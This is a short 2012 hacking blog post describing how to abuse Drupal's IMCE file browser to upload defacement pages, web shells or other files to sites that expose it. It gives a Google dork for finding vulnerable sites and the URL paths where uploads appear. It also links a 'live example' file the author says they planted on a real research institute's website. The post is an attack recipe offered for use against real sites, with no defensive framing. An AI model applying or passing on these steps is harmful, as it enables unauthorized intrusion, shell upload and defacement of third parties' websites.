Trending: TeCh ZoNe

Sunday, July 22, 2012

Remote file upload vulnerability method | Drupal IMCE Mkdir [exploit]

This is a very simple remote file upload exploit on drupal and IMCE MKdir  in which you can upload defaces,shell,images etc.. (jpgs,php,asp,shell.asp;) format!!! 


                                                                                  

  • GOOGLE DORK -:


inurl:"/IMCE?dir ="intitle: "File Browser"inurl:"/imce?dir="  search the dork on google open website check upload option upload deface,image etc..etC

  • Deface Access :-



  1. http://website.com/files/yourfilename
  2. http://www.website.com/abc/files/abc/yourfilehere


live example...by me :P  
http://ciam.inra.fr/biosp/sites/ciam.inra.fr.biosp/files/images/%21.3.B.jpg

All Rights Reserved TeCh ZoNe | Blogger Template by Bloggermint
back to top